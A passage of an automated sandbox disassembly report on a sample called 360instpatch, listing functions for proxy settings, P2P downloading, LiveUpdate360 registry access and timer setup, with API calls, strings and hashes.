                                                                                                                                                                                                                • Part of subcall function 6BF0429A: __EH_prolog3.LIBCMT ref: 6BF042B3
                                                                                                                                                                                                                • Part of subcall function 6BF0429A: StrStrIW.SHLWAPI(?,file://,00000001,00000000,00000000,00000000,000000FF), ref: 6BF0436A
                                                                                                                                                                                                                • Part of subcall function 6BF0429A: _wcslen.LIBCMT ref: 6BF0438A
                                                                                                                                                                                                                • Part of subcall function 6BF0429A: _wcslen.LIBCMT ref: 6BF04398
                                                                                                                                                                                                                • Part of subcall function 6BF0429A: _wcslen.LIBCMT ref: 6BF043AB
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4119900398.000000006BEE1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6BEE0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119875025.000000006BEE0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119950476.000000006BF5F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119997029.000000006BF7F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119997029.000000006BF85000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120063873.000000006BF8A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120095888.000000006BFCC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120132063.000000006BFCF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_6bee0000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: _wcslen$_memset$CountH_prolog3Tick$_wcsncpy
                                                                                                                                                                                                              • String ID: [Update Ie Proxy] WPAD[%d], Proxy[%s], PAC[%s], DialUp[%d]$http://$http=$socks=
                                                                                                                                                                                                              • API String ID: 2113534588-487906059
                                                                                                                                                                                                              • Opcode ID: 01ed30d33635760582ee4902ba68b7500b00201235740488d88cbc48b3eadae3
                                                                                                                                                                                                              • Instruction ID: 28ca380560a5266b4a59b44aba0b55445e4829200540159fe1f684ead109901f
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 01ed30d33635760582ee4902ba68b7500b00201235740488d88cbc48b3eadae3
                                                                                                                                                                                                              • Instruction Fuzzy Hash: F0A17F73500609DBDB20CF74CC91AEA73F8BF44314F10452AEA19DA260EF78EA44DBA0
                                                                                                                                                                                                              Function 6BEF4F3B Relevance: 26.7, APIs: 4, Strings: 11, Instructions: 480COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 6BF3AB44: __EH_prolog3_catch.LIBCMT ref: 6BF3AB4B
                                                                                                                                                                                                              • GetLastError.KERNEL32(AA5945B3,00000000,?,00000000), ref: 6BEF4FA7
                                                                                                                                                                                                              • GetLastError.KERNEL32(00000001,AA5945B3,00000000,?,00000000), ref: 6BEF5020
                                                                                                                                                                                                                • Part of subcall function 6BF1BFAE: __EH_prolog3.LIBCMT ref: 6BF1BFB5
                                                                                                                                                                                                                • Part of subcall function 6BF1BFAE: _memset.LIBCMT ref: 6BF1C152
                                                                                                                                                                                                              • _memset.LIBCMT ref: 6BEF53F1
                                                                                                                                                                                                              • GetTickCount.KERNEL32 ref: 6BEF54D6
                                                                                                                                                                                                                • Part of subcall function 6BF23F7C: _memset.LIBCMT ref: 6BF23FAF
                                                                                                                                                                                                                • Part of subcall function 6BF23F7C: wvnsprintfW.SHLWAPI(?,000003FF,?,?), ref: 6BF23FCA
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • ERR_HTTPMGR_DNS_NOT_FINISH, xrefs: 6BEF556F
                                                                                                                                                                                                              • [%d.] Start Through FireWall http protocol PickIp Failed, xrefs: 6BEF5204
                                                                                                                                                                                                              • ERR_HTTPMGR_NOT_IP, xrefs: 6BEF510B, 6BEF552A
                                                                                                                                                                                                              • [%d.] proxy=%d,Errcode = %u(%s), , xrefs: 6BEF5581
                                                                                                                                                                                                              • [%d.] ErrorCode = %d,, xrefs: 6BEF502D
                                                                                                                                                                                                              • [%d.%3d] , xrefs: 6BEF52EF
                                                                                                                                                                                                              • [%d.] Start Through FireWall http protocol PickUrl Failed, xrefs: 6BEF509D
                                                                                                                                                                                                              • [%d.] Errcode = %u(%s), xrefs: 6BEF5122
                                                                                                                                                                                                              • [%d.%3d] ConnectNum = %d, xrefs: 6BEF54F7
                                                                                                                                                                                                              • [%d.] ErrorCode = %d , , xrefs: 6BEF4FB4
                                                                                                                                                                                                              • [%d.] proxy=%d,Errcode = %u(%s), , xrefs: 6BEF5547
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4119900398.000000006BEE1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6BEE0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119875025.000000006BEE0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119950476.000000006BF5F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119997029.000000006BF7F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119997029.000000006BF85000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120063873.000000006BF8A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120095888.000000006BFCC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120132063.000000006BFCF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_6bee0000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: _memset$ErrorLast$CountH_prolog3H_prolog3_catchTickwvnsprintf
                                                                                                                                                                                                              • String ID: ERR_HTTPMGR_DNS_NOT_FINISH$ERR_HTTPMGR_NOT_IP$[%d.%3d] $[%d.%3d] ConnectNum = %d$[%d.] ErrorCode = %d , $[%d.] Errcode = %u(%s)$[%d.] ErrorCode = %d,$[%d.] Start Through FireWall http protocol PickIp Failed$[%d.] Start Through FireWall http protocol PickUrl Failed$[%d.] proxy=%d,Errcode = %u(%s), $[%d.] proxy=%d,Errcode = %u(%s),
                                                                                                                                                                                                              • API String ID: 2301807879-2515552278
                                                                                                                                                                                                              • Opcode ID: ad54e349a54a371b914d9978752e331c618910dcb0800a83917811d56dd55238
                                                                                                                                                                                                              • Instruction ID: b898d9655538acce0ba5db0dc17f382aaa5b7d41cd63b0e4f0868087f86d523f
                                                                                                                                                                                                              • Opcode Fuzzy Hash: ad54e349a54a371b914d9978752e331c618910dcb0800a83917811d56dd55238
                                                                                                                                                                                                              • Instruction Fuzzy Hash: BD024B71A003059FEB10CFB4C841BAE77FAEF04304F20856DE95A97291DB3EA955CBA1
                                                                                                                                                                                                              Function 6BF2E724 Relevance: 26.3, APIs: 12, Strings: 3, Instructions: 88windowregistrythreadCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 6BF2E732
                                                                                                                                                                                                                • Part of subcall function 6BEFAE3C: KiUserExceptionDispatcher.NTDLL(406D1388,00000000,00000004,00001000,6BF78AA8,00000018,6BF2E73E,00000000), ref: 6BEFAE6F
                                                                                                                                                                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 6BF2E760
                                                                                                                                                                                                              • RegisterClassExW.USER32(00000030), ref: 6BF2E780
                                                                                                                                                                                                              • GetModuleHandleW.KERNEL32(00000000,00000000), ref: 6BF2E788
                                                                                                                                                                                                              • CreateWindowExW.USER32(00000000,360AsyncNetwork,360AsyncNetwork,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 6BF2E795
                                                                                                                                                                                                                • Part of subcall function 6BF2C5B6: SetTimer.USER32(?,00000000,00000064,00000000), ref: 6BF2C5D6
                                                                                                                                                                                                              • SetEvent.KERNEL32(?,00000000), ref: 6BF2E7B3
                                                                                                                                                                                                              • TranslateMessage.USER32(?), ref: 6BF2E7C4
                                                                                                                                                                                                              • DispatchMessageW.USER32(?), ref: 6BF2E7CE
                                                                                                                                                                                                              • KiUserCallbackDispatcher.NTDLL(?,00000000,00000000,00000000), ref: 6BF2E7DB
                                                                                                                                                                                                              • DestroyWindow.USER32(?,00000000), ref: 6BF2E7F0
                                                                                                                                                                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 6BF2E7F7
                                                                                                                                                                                                              • UnregisterClassW.USER32(360AsyncNetwork,00000000), ref: 6BF2E7FF
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4119900398.000000006BEE1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6BEE0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119875025.000000006BEE0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119950476.000000006BF5F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119997029.000000006BF7F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119997029.000000006BF85000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120063873.000000006BF8A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120095888.000000006BFCC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120132063.000000006BFCF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_6bee0000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: HandleModule$ClassDispatcherMessageUserWindow$CallbackCreateCurrentDestroyDispatchEventExceptionRegisterThreadTimerTranslateUnregister
                                                                                                                                                                                                              • String ID: 0$360AsyncNetwork$p2sp.Network
                                                                                                                                                                                                              • API String ID: 4253188931-2555541505
                                                                                                                                                                                                              • Opcode ID: abbda58daa3d984bd4bd338538025021b94fbea49de6136526d81ac54af83728
                                                                                                                                                                                                              • Instruction ID: dc5d48a66f554959f1932968021658963ab893a929b83e550e70b95904b6f76f
                                                                                                                                                                                                              • Opcode Fuzzy Hash: abbda58daa3d984bd4bd338538025021b94fbea49de6136526d81ac54af83728
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0521D8B3D21228ABDF519FE5CC489DEBFBCFF5A651B10405AF501E2120DB788905CBA5
                                                                                                                                                                                                              Function 6BF0B868 Relevance: 25.0, APIs: 5, Strings: 9, Instructions: 492COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • [%d.] DUQuota stop, xrefs: 6BF0BB87
                                                                                                                                                                                                              • [%d.%3d] CheckTimeout StartP2PDownloads, xrefs: 6BF0BD48
                                                                                                                                                                                                              • [%d.] SetP2pSpeedLimitState;%d., xrefs: 6BF0BBB2
                                                                                                                                                                                                              • [%d.] BackupZone enable all task., xrefs: 6BF0B943
                                                                                                                                                                                                              • [%d.] [Resource] StartResourceConnect., xrefs: 6BF0B89C
                                                                                                                                                                                                              • [%d.] slow speed :%d close NonUrgentMode ., xrefs: 6BF0B9FE
                                                                                                                                                                                                              • [%d.] HttpMgr ReBoot , xrefs: 6BF0BE7B
                                                                                                                                                                                                              • [%d.] P2P Delay End:%d , xrefs: 6BF0BD03
                                                                                                                                                                                                              • [%d.] Downlaod OnTimeout Failed:%d , xrefs: 6BF0BAD0
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4119900398.000000006BEE1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6BEE0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119875025.000000006BEE0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119950476.000000006BF5F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119997029.000000006BF7F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119997029.000000006BF85000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120063873.000000006BF8A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120095888.000000006BFCC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120132063.000000006BFCF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_6bee0000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: _wcslen$CountH_prolog3Tick
                                                                                                                                                                                                              • String ID: [%d.%3d] CheckTimeout StartP2PDownloads$[%d.] BackupZone enable all task.$[%d.] DUQuota stop$[%d.] Downlaod OnTimeout Failed:%d $[%d.] HttpMgr ReBoot $[%d.] P2P Delay End:%d $[%d.] SetP2pSpeedLimitState;%d.$[%d.] [Resource] StartResourceConnect.$[%d.] slow speed :%d close NonUrgentMode .
                                                                                                                                                                                                              • API String ID: 899965582-346055655
                                                                                                                                                                                                              • Opcode ID: 6d2a9c8823671dbf16ecb2bf554ee4873c3b96f16f645b19619adca9143d9f5e
                                                                                                                                                                                                              • Instruction ID: 6c3ab65de6f5cd1cf5ef102c9dc44d47db5cf6bc806e0b988ca4261efdb427be
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6d2a9c8823671dbf16ecb2bf554ee4873c3b96f16f645b19619adca9143d9f5e
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 86128172900B02CFD725DFB4C8A1AAAB7F2AF45309F104D6DD496876B2DF39A845DB01
                                                                                                                                                                                                              Function 6BF37104 Relevance: 24.8, APIs: 12, Strings: 2, Instructions: 281networkCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4119900398.000000006BEE1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6BEE0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119875025.000000006BEE0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119950476.000000006BF5F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119997029.000000006BF7F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119997029.000000006BF85000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120063873.000000006BF8A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120095888.000000006BFCC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120132063.000000006BFCF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_6bee0000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CountTick$htonlhtonsinet_addr
                                                                                                                                                                                                              • String ID: 180.153.227.168$[Tracker]
                                                                                                                                                                                                              • API String ID: 3427813670-2722976985
                                                                                                                                                                                                              • Opcode ID: 094554e865b726a53133bc6d5f7ae60a2f0d9a80bd9230c06dce2580b45e13d5
                                                                                                                                                                                                              • Instruction ID: 4e59d35e27a602c0cff66d0325d3b6943d3e1e077777604b5419f40849037f6a
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 094554e865b726a53133bc6d5f7ae60a2f0d9a80bd9230c06dce2580b45e13d5
                                                                                                                                                                                                              • Instruction Fuzzy Hash: C4B18D7350021AEFCB44DFB4D881DAEBBB5FF05354B108469E81696270EB38EA54CBE1
                                                                                                                                                                                                              Function 6BF26DCB Relevance: 24.6, APIs: 6, Strings: 8, Instructions: 110registryCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • RegOpenKeyExW.KERNEL32(80000002,SOFTWARE\LiveUpdate360,00000000,000F003F,6BFCC288,00000000,6BF8AC78,74DF30D0,?,6BFCC3F0,6BFCC288), ref: 6BF26DF2
                                                                                                                                                                                                              • RegCreateKeyExW.KERNEL32(80000002,SOFTWARE\LiveUpdate360,00000000,00000000,00000000,000F003F,00000000,6BFCC288,?,?,6BFCC3F0,6BFCC288), ref: 6BF26E17
                                                                                                                                                                                                              • RegOpenKeyExW.ADVAPI32(80000001,SOFTWARE\LiveUpdate360,00000000,000F003F,6BFCC288,?,6BFCC3F0,6BFCC288), ref: 6BF26E2D
                                                                                                                                                                                                              • RegCreateKeyExW.ADVAPI32(80000001,SOFTWARE\LiveUpdate360,00000000,00000000,00000000,000F003F,00000000,6BFCC288,?,?,6BFCC3F0,6BFCC288), ref: 6BF26E4A
                                                                                                                                                                                                              • RegOpenKeyExW.ADVAPI32(80000002,SOFTWARE\LiveUpdate360,00000000,00020019,6BFCC3F0), ref: 6BF26E71
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(6BFCC3F0), ref: 6BF26EF4
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4119900398.000000006BEE1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6BEE0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119875025.000000006BEE0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119950476.000000006BF5F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119997029.000000006BF7F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119997029.000000006BF85000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120063873.000000006BF8A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120095888.000000006BFCC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120132063.000000006BFCF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_6bee0000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Open$Create$Close
                                                                                                                                                                                                              • String ID: Intranet$Neverup$SOFTWARE\LiveUpdate360$customhttp$customproxytype$customsocks$ieproxy$proxytype
                                                                                                                                                                                                              • API String ID: 744170003-1635914898
                                                                                                                                                                                                              • Opcode ID: fe9d163e86ad4eeb27d8f1cf8aac6b128c04d5615066190961435fb85caaec75
                                                                                                                                                                                                              • Instruction ID: b73b7f0abc10b03699e877a4c34d5aeb474694ab00adc627e51a71bdb57f17ac
                                                                                                                                                                                                              • Opcode Fuzzy Hash: fe9d163e86ad4eeb27d8f1cf8aac6b128c04d5615066190961435fb85caaec75
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7C31A27790010CFBEB119BE5DD85EDFBF7DEB15288F5000A5BA04B1021E7368E54EA60
                                                                                                                                                                                                              Function 6BF0E53F Relevance: 24.2, APIs: 16, Instructions: 180timesynchronizationCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • __EH_prolog3_catch.LIBCMT ref: 6BF0E546
                                                                                                                                                                                                              • __CxxThrowException@8.LIBCMT ref: 6BF0E56A
                                                                                                                                                                                                              • CreateWaitableTimerW.KERNEL32(00000000,00000001,00000000), ref: 6BF0E5F1
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 6BF0E600
                                                                                                                                                                                                              • SetWaitableTimer.KERNEL32(00000000,?,00000000,00000000,00000000,00000000), ref: 6BF0E628
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 6BF0E632
                                                                                                                                                                                                              • CreateMutexW.KERNEL32(00000000,00000000,00000000), ref: 6BF0E64B
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 6BF0E658
                                                                                                                                                                                                              • CreateSemaphoreW.KERNEL32(00000000,?,?,00000000), ref: 6BF0E67C
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 6BF0E685
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4119900398.000000006BEE1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6BEE0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119875025.000000006BEE0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119950476.000000006BF5F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119997029.000000006BF7F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119997029.000000006BF85000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120063873.000000006BF8A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120095888.000000006BFCC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120132063.000000006BFCF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_6bee0000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ErrorLast$Create$TimerWaitable$Exception@8H_prolog3_catchMutexSemaphoreThrow
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1927663649-0
                                                                                                                                                                                                              • Opcode ID: ff9e4d788a12e83dcd3632b01de976eee829eb8e0b26332bc61764107fa02255
                                                                                                                                                                                                              • Instruction ID: 6db4f99f9fe1c86425821fc8a83857c9d6468ac5ed1f2822fbc426244e5ffaca
                                                                                                                                                                                                              • Opcode Fuzzy Hash: ff9e4d788a12e83dcd3632b01de976eee829eb8e0b26332bc61764107fa02255
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 05611EB2D20708DFDB64DF69D894AAEBBF8FB08300B10586EE506D7660E774D9448F61
                                                                                                                                                                                                              Function 6BEE888B Relevance: 24.2, APIs: 16, Instructions: 166timesynchronizationCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • __EH_prolog3_catch.LIBCMT ref: 6BEE8892
                                                                                                                                                                                                              • __CxxThrowException@8.LIBCMT ref: 6BEE88B6
                                                                                                                                                                                                              • CreateWaitableTimerW.KERNEL32(00000000,00000001,00000000), ref: 6BEE8918
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 6BEE8927
                                                                                                                                                                                                              • SetWaitableTimer.KERNEL32(00000000,?,00000000,00000000,00000000,00000000), ref: 6BEE894F
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 6BEE8959
                                                                                                                                                                                                              • CreateMutexW.KERNEL32(00000000,00000000,00000000), ref: 6BEE8972
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 6BEE897F
                                                                                                                                                                                                              • CreateSemaphoreW.KERNEL32(00000000,?,?,00000000), ref: 6BEE89A3
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 6BEE89AC
                                                                                                                                                                                                              • CreateSemaphoreW.KERNEL32(00000000,00000000,?,00000000), ref: 6BEE89C8
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 6BEE89D1
                                                                                                                                                                                                              • CreateEventW.KERNEL32(00000000,00000001,00000001,00000000), ref: 6BEE89F3
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 6BEE89FC
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4119900398.000000006BEE1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6BEE0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119875025.000000006BEE0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119950476.000000006BF5F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119997029.000000006BF7F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119997029.000000006BF85000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120063873.000000006BF8A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120095888.000000006BFCC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120132063.000000006BFCF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_6bee0000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ErrorLast$Create$SemaphoreTimerWaitable$EventException@8H_prolog3_catchMutexThrow
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2170963793-0
                                                                                                                                                                                                              • Opcode ID: 15f812b2dae9a83ab4e4f0ae0571bc36f5a4099c3560ce3d86cb3f3edc7d99bf
                                                                                                                                                                                                              • Instruction ID: 6f88f3f1356e219e7286d44de6db01e924f3a2e5a6efbdad5a5419e51d2425c9
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 15f812b2dae9a83ab4e4f0ae0571bc36f5a4099c3560ce3d86cb3f3edc7d99bf
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0E515EB1910308DFDB64DFA8D884A9EBBF8FB08304F50446EE906E3650E375A9458F71
                                                                                                                                                                                                              Function 00B7EA27 Relevance: 23.2, APIs: 10, Strings: 3, Instructions: 400COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • __EH_prolog3.LIBCMT ref: 00B7EA49
                                                                                                                                                                                                                • Part of subcall function 00B787F5: _memset.LIBCMT ref: 00B78838
                                                                                                                                                                                                                • Part of subcall function 00B787F5: __wsplitpath.LIBCMT ref: 00B78845
                                                                                                                                                                                                                • Part of subcall function 00B787F5: GetDiskFreeSpaceExW.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00B78874
                                                                                                                                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00B7EA8E
                                                                                                                                                                                                                • Part of subcall function 00B82080: InitializeCriticalSection.KERNEL32(?,?,00000000,?,?,00B7EAA4,?,?,00100000,00000000,0000008C), ref: 00B820EE
                                                                                                                                                                                                              • _memset.LIBCMT ref: 00B7EC0A
                                                                                                                                                                                                              • SHGetSpecialFolderPathW.SHELL32(00000000,?,00000026,00000001,00100000,00000000,0000008C), ref: 00B7EC1F
                                                                                                                                                                                                              • PathAppendW.SHLWAPI(?,360\360Safe), ref: 00B7EC2D
                                                                                                                                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00B7EC63
                                                                                                                                                                                                              • GetTickCount.KERNEL32 ref: 00B7ED12
                                                                                                                                                                                                                • Part of subcall function 00B1DFB0: __CxxThrowException@8.LIBCMT ref: 00B1DFC2
                                                                                                                                                                                                              • _memset.LIBCMT ref: 00B7ED82
                                                                                                                                                                                                              • SHGetSpecialFolderPathW.SHELL32(00000000,00000000,00000026,00000001), ref: 00B7ED94
                                                                                                                                                                                                              • PathAppendW.SHLWAPI(00000000,360Safe), ref: 00B7ED9F
                                                                                                                                                                                                                • Part of subcall function 00B3F087: std::_String_base::_Xlen.LIBCPMT ref: 00B3F09C
                                                                                                                                                                                                                • Part of subcall function 00B2A8EB: _wcsnlen.LIBCMT ref: 00B2A91D
